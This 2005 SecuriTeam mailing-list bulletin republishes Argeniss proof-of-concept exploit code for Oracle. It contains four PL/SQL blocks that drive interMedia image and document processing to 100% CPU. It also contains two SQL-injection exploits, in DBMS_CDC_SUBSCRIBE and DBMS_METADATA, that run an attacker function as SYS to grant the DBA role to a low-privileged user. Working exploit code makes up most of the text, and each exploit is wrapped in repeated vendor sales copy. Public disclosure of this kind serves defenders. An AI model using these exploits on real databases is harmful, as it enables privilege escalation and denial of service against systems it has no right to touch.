From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 21 Apr 2005 16:40:04 +0200
Subject: [EXPL] Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050421150309.38AFE57BF@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE,
DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous articles:
<http://www.securiteam.com/securitynews/5YP0S0AFGK.html>; Oracle interMedia
DoS, <http://www.securiteam.com/securitynews/5VP0P0AFGM.html>; Multiple
SQL Injection Vulnerabilities in DBMS_CDC_SUBSCRIBE and
DBMS_CDC_ISUBSCRIBE Packages and
<http://www.securiteam.com/securitynews/5UP0O0AFGO.html>; Multiple SQL
Injection Vulnerabilities in DBMS_METADATA Package, multiple
vulnerabilities have been discovered in Oracle. The following exploit code
can be used to test your Oracle installation for the mentioned
vulnerabilities.
DETAILS
Exploit for Oracle interMedia DoS:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com
You think you are secure because you are running the unbreakable
Oracle, you think you are secure because you are up to date with patches,
you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five
seconds bypassing all protection mechanisms. Think how much money you will
loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best
protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes
all unpatched Oracle vulnerability information with workaround scripts
ready to apply.
Proof of concept exploit code for the Denial of Service vulnerability
in Oracle InterMedia.
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)
These exploits makes the Oracle process to consume 100% CPU usage.
*/
-- Exploit 1: Explicitly setting two null bytes to localData property
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init();
Image.source.localData := TO_BLOB(HEXTORAW('0000'));
Image.setProperties;
END;
/
-- Exploit 2: Loading from filesystem
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR',
'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/
-- Exploit 3: Loading from web
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('HTTP', 'www.someserver.com/',
'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/
-- Exploit 4: Explicitly setting two null bytes to localData property of
ORDDoc type.
DECLARE
Doc ORDSYS.ORDDoc;
R RAW(30000);
BEGIN
Doc := ORDSYS.ORDDoc.init();
Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
Doc.setProperties (R, FALSE);
END;
/
Exploit for DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com
You think you are secure because you are running the unbreakable
Oracle, you think you are secure because you are up to date with patches,
you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five
seconds bypassing all protection mechanisms. Think how much money you will
loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best
protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes
all unpatched Oracle vulnerability information with workaround scripts
ready to apply.
Proof of concept exploit code for the SQL Injection vulnerability in
Oracle
Database Server standard packages SYS.DBMS_CDC_SUBSCRIBE and
SYS.DBMS_CDC_ISUBSCRIBE (parameter SUBSCRIPTION_NAME).
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)
This exploit grants the DBA role to the user SCOTT.
Required privileges: Database user with privileges to create or modify
functions.
For more information on SQL injection issues in Oracle and how this
exploit works
see the Advanced SQL Injection in Oracle databases presentation
available at
http://www.argeniss.com/research.html
*/
-- First we create the function to be injected and executed as the SYS
user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/
-- Inject the function in the vulnerable procedure
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
END;
/
Exploit for DBMS_METADATA package:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com
You think you are secure because you are running the unbreakable
Oracle, you think you are secure because you are up to date with patches,
you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five
seconds bypassing all protection mechanisms. Think how much money you will
loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best
protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes
all unpatched Oracle vulnerability information with workaround scripts
ready to apply.
Proof of concept exploit code for the SQL Injection vulnerability in
Oracle
Database Server standard package DBMS_METADATA.
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)
This exploit grants the DBA role to the user SCOTT.
Required privileges: Database user with privileges to create or modify
functions.
For more information on SQL injection issues in Oracle and how this
exploit works
see the Advanced SQL Injection in Oracle databases presentation
available at
http://www.argeniss.com/research.html
*/
-- First we create the function to be injected and executed as the SYS
user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/
-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','') FROM
dual;
/
ADDITIONAL INFORMATION
The information has been provided by <mailto:cesarc56@yahoo.com.> Cesar.
The original article can be found at:
<http://www.argeniss.com/research.html>;
http://www.argeniss.com/research.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
